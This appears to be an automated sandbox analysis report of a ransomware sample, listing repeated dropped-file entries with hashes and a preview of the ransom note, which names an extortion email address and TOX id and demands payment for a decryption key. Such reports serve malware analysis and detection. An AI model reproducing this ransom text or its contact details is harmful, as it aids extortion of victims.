                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
